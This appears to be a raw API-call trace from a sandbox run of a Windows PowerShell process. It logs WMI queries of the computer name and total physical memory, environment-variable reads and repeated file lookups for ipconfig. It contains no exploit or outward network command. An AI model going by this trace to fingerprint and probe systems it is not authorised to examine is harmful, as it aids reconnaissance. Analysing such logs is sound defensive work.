	[0211.886] CoGetObjectContext (in: riid=0x1c6ecd28*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ecd20 | out: ppv=0x1c6ecd20*=0x321868) returned 0x0
	[0211.886] IComThreadingInfo:GetCurrentApartmentType (in: This=0x321868, pAptType=0x1c6ecd40 | out: pAptType=0x1c6ecd40*=1) returned 0x0
	[0211.886] IUnknown:QueryInterface (in: This=0x321868, riid=0x3005488*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c6ece48 | out: ppvObject=0x1c6ece48*=0x0) returned 0x80004002
	[0211.886] IUnknown:Release (This=0x321868) returned 0x1
	[0211.886] CoGetClassObject (in: rclsid=0x1b82a358*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c6ec3b0 | out: ppv=0x1c6ec3b0*=0x1cd11de0) returned 0x0
	[0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd11de0, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c6ec0c0 | out: ppvObject=0x1c6ec0c0*=0x0) returned 0x80004002
	[0211.887] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cd11de0, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ec0a8 | out: ppvObject=0x1c6ec0a8*=0x1cd22090) returned 0x0
	[0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd22090, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebfb0 | out: ppvObject=0x1c6ebfb0*=0x1cd22090) returned 0x0
	[0211.887] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd22090, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c6ec030 | out: ppvObject=0x1c6ec030*=0x0) returned 0x80004002
	[0211.888] WbemDefPath:IUnknown:AddRef (This=0x1cd22090) returned 0x3
	[0211.888] CoGetContextToken (in: pToken=0x1c6ebc80 | out: pToken=0x1c6ebc80) returned 0x0
	[0211.888] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd22090, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebc40 | out: ppvObject=0x1c6ebc40*=0x1b852a70) returned 0x0
	[0211.888] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b852a70, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c6ebc70 | out: pCid=0x1c6ebc70*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0211.888] WbemDefPath:IUnknown:Release (This=0x1b852a70) returned 0x3
	[0211.888] CoGetContextToken (in: pToken=0x1c6ebc50 | out: pToken=0x1c6ebc50) returned 0x0
	[0211.888] WbemDefPath:IUnknown:AddRef (This=0x1cd22090) returned 0x4
	[0211.888] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd22090, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c6ebd68 | out: ppvObject=0x1c6ebd68*=0x0) returned 0x80004002
	[0211.889] WbemDefPath:IUnknown:Release (This=0x1cd22090) returned 0x3
	[0211.889] WbemDefPath:IUnknown:Release (This=0x1cd22090) returned 0x2
	[0211.889] WbemDefPath:IUnknown:Release (This=0x1cd11de0) returned 0x0
	[0211.889] WbemDefPath:IUnknown:Release (This=0x1cd22090) returned 0x1
	[0211.889] CoGetContextToken (in: pToken=0x1c6ec980 | out: pToken=0x1c6ec980) returned 0x0
	[0211.889] CoGetContextToken (in: pToken=0x1c6ec8c0 | out: pToken=0x1c6ec8c0) returned 0x0
	[0211.889] WbemDefPath:IUnknown:AddRef (This=0x1cd22090) returned 0x2
	[0211.889] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd22090, riid=0x1c6eca00*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ec9e0 | out: ppvObject=0x1c6ec9e0*=0x1cd22090) returned 0x0
	[0211.889] WbemDefPath:IUnknown:Release (This=0x1cd22090) returned 0x2
	[0211.890] WbemDefPath:IUnknown:Release (This=0x1cd22090) returned 0x1
	[0211.890] CoGetContextToken (in: pToken=0x1c6ecb00 | out: pToken=0x1c6ecb00) returned 0x0
	[0211.890] CoGetContextToken (in: pToken=0x1c6eca40 | out: pToken=0x1c6eca40) returned 0x0
	[0211.890] WbemDefPath:IUnknown:AddRef (This=0x1cd22090) returned 0x2
	[0211.890] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cd22090, riid=0x1c6ecb80*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c6ecb60 | out: ppvObject=0x1c6ecb60*=0x1cd22090) returned 0x0
	[0211.890] WbemDefPath:IUnknown:Release (This=0x1cd22090) returned 0x2
	[0211.890] WbemDefPath:IUnknown:AddRef (This=0x1cd22090) returned 0x3
	[0211.890] WbemDefPath:IWbemPath:SetText (This=0x1cd22090, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0211.890] WbemDefPath:IUnknown:Release (This=0x1cd22090) returned 0x2
	[0211.890] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ecdc0 | out: puCount=0x1c6ecdc0*=0x2) returned 0x0
	[0211.891] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecdc0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecdc0*=0x17, pszText=0x0) returned 0x0
	[0211.891] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecdc0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecdc0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.891] CoTaskMemAlloc (cb=0x8) returned 0x1b83b890
	[0211.891] IEnumWbemClassObject:Next (in: This=0x1cd208e8, lTimeout=-1, uCount=0x1, apObjects=0x1b83b890, puReturned=0x1c6ece78 | out: apObjects=0x1b83b890*=0x0, puReturned=0x1c6ece78*=0x0) returned 0x1
	[0211.892] CoTaskMemFree (pv=0x1b83b890) 
	[0211.892] CoGetContextToken (in: pToken=0x1c6ecc00 | out: pToken=0x1c6ecc00) returned 0x0
	[0211.892] WbemLocator:IUnknown:Release (This=0x1b83ca80) returned 0x1
	[0211.892] IUnknown:Release (This=0x1cd208e8) returned 0x0
	[0211.894] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0211.894] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0211.894] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.894] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0211.894] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0211.894] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0211.894] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0211.894] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ecf20 | out: puCount=0x1c6ecf20*=0x2) returned 0x0
	[0211.894] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecf20*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf20*=0x17, pszText=0x0) returned 0x0
	[0211.894] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecf20*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf20*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.894] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf10*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf0c*=0, plFlavor=0x1c6ecf08*=0 | out: pVal=0x1c6ecf10*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ecf0c*=8, plFlavor=0x1c6ecf08*=64) returned 0x0
	[0211.895] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0211.895] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__CLASS", lFlags=0, pVal=0x1c6ecf20*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64 | out: pVal=0x1c6ecf20*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ecf1c*=8, plFlavor=0x1c6ecf18*=64) returned 0x0
	[0211.895] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0211.895] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0211.895] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0211.895] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0211.895] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6eceb0 | out: puCount=0x1c6eceb0*=0x2) returned 0x0
	[0211.895] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6eceb0*=0x0, pszText=0x0 | out: puBuffLength=0x1c6eceb0*=0x17, pszText=0x0) returned 0x0
	[0211.895] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6eceb0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6eceb0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.114] IWbemClassObject:GetNames (in: This=0x1cd20950, wszQualifierName=0x0, lFlags=48, pQualifierVal=0x1c6ecea8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pNames=0x1c6ecea0 | out: pNames=0x1c6ecea0*="\x01ƀ\x08") returned 0x0
	[0212.114] SafeArrayGetDim (psa=0x1b833520) returned 0x1
	[0212.115] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__GENUS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.115] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__CLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.115] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0212.116] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__SUPERCLASS", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.116] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__DYNASTY", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.116] SysStringLen (param_1="Win32_ComputerSystem") returned 0x14
	[0212.116] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__RELPATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.116] SysStringLen (param_1="Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x25
	[0212.117] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__PROPERTY_COUNT", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3a, varVal2=0x0), pType=0x1c6ece9c*=3, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.117] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__DERIVATION", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1b833520*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x1b83b880, rgsabound=((cElements=0x0, lLbound=0))), varVal2=0x0), pType=0x1c6ece9c*=8200, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.117] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__SERVER", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XDUWTFONO", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.118] SysStringLen (param_1="XDUWTFONO") returned 0x9
	[0212.118] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__NAMESPACE", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.118] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
	[0212.118] IWbemClassObject:Get (in: This=0x1cd20950, wszName="__PATH", lFlags=0, pVal=0x1c6ecea0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ece9c*=0, plFlavor=0x1c6ece98*=0 | out: pVal=0x1c6ecea0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x1c6ece9c*=8, plFlavor=0x1c6ece98*=64) returned 0x0
	[0212.118] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0212.118] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cd1dcd0, puCount=0x1c6ecf40 | out: puCount=0x1c6ecf40*=0x2) returned 0x0
	[0212.118] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecf40*=0x0, pszText=0x0 | out: puBuffLength=0x1c6ecf40*=0x17, pszText=0x0) returned 0x0
	[0212.118] WbemDefPath:IWbemPath:GetText (in: This=0x1cd1dcd0, lFlags=4, puBuffLength=0x1c6ecf40*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c6ecf40*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0212.118] IWbemClassObject:Get (in: This=0x1cd20950, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x1c6ecf30*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ecf2c*=0, plFlavor=0x1c6ecf28*=0 | out: pVal=0x1c6ecf30*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x1c6ecf2c*=21, plFlavor=0x1c6ecf28*=32) returned 0x0
	[0212.119] SysStringLen (param_1="2146942976") returned 0xa
	[0212.119] IWbemClassObject:Get (in: This=0x1cd20950, wszName="TotalPhysicalMemory", lFlags=0, pVal=0x1c6ed160*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x1c6ed15c*=21, plFlavor=0x1c6ed158*=32 | out: pVal=0x1c6ed160*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="2146942976", varVal2=0x0), pType=0x1c6ed15c*=21, plFlavor=0x1c6ed158*=32) returned 0x0
	[0212.119] SysStringLen (param_1="2146942976") returned 0xa
	[0212.124] CoTaskMemAlloc (cb=0x104) returned 0x1b84b990
	[0212.124] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x1b84b990, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0212.124] CoTaskMemFree (pv=0x1b84b990) 
	[0212.130] CoTaskMemAlloc (cb=0x104) returned 0x1b84b990
	[0212.130] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b84b990, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0212.130] CoTaskMemFree (pv=0x1b84b990) 
	[0212.130] CoTaskMemAlloc (cb=0x128) returned 0x1b7cf0d0
	[0212.130] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x1b7cf0d0, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0212.131] CoTaskMemFree (pv=0x1b7cf0d0) 
	[0212.140] CoTaskMemAlloc (cb=0x20e) returned 0x33bcb0
	[0212.140] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x33bcb0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0212.140] CoTaskMemFree (pv=0x33bcb0) 
	[0212.146] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.148] SetErrorMode (uMode=0x1) returned 0x1
	[0212.152] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.ps1", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.403] SetErrorMode (uMode=0x1) returned 0x1
	[0212.405] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.406] SetErrorMode (uMode=0x1) returned 0x1
	[0212.406] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.psm1", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.420] SetErrorMode (uMode=0x1) returned 0x1
	[0212.422] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.422] SetErrorMode (uMode=0x1) returned 0x1
	[0212.422] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.psd1", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.432] SetErrorMode (uMode=0x1) returned 0x1
	[0212.433] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.434] SetErrorMode (uMode=0x1) returned 0x1
	[0212.434] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.COM", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0212.663] SetErrorMode (uMode=0x1) returned 0x1
	[0212.665] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c6ec600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0212.666] SetErrorMode (uMode=0x1) returned 0x1
	[0212.666] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\ipconfig.EXE", lpFindFileData=0x1c6ec7a0 | out: lpFindFileData=0x1c6ec7a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
